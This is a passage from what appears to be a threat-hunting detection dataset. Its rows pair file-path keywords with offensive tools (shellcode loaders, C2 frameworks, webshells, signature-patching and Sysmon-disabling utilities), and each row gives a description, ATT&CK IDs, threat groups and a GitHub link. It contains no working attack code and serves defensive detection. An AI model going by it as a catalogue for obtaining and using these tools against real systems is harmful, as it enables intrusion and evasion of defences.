anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*/shellcode.bin.*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/shellcode.hex*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*/shellcode.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/shellcode_excel*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/ShellCode_Loader*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*/shellcode_samples/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/shellcode_sources/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/ShellcodeFluctuation*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*/Shellcode-Hide.git*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/SHELLCODELOADER*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/Shellcode-Loader.git*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,1,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*/shellcodes/utils.py*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/shellcodetester*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*/ShellGhost.git*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*/shellinject*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/ShellPop*,offensive_tool_keyword,ShellPop,Shellpop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.,T1059 - T1574 - T1055 - T1021,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/0x00-0x00/ShellPop,1,0,N/A,N/A,10,1393,237,2019-04-02T14:53:19Z,2018-03-08T03:58:00Z -*/Shells/shell.aspx*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.jsp*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.php*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.py*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.sh*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/tomcat.war*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/wordpress.zip*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/shellshock.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/sherlocksecurity/*,offensive_tool_keyword,POC,POC and exploit tools on github,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/sherlocksecurity,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Shhmon/*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*/ShimsInstaller.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/shocknawe/*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*/shodan-api.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/shspawnas/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/ShuckNT.git*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*/si1ent-le/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/si1ent-le/CVE-2022-0847,1,1,N/A,N/A,1,0,2,2022-03-08T05:18:15Z,2022-03-08T04:51:02Z -*/SigFlip.*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/sigflip.x64.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/sigflip.x86.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigFlip/*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigLoader.go*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigLoader/*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigLoader/*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/signer-exe.py*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SilentClean.exe*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 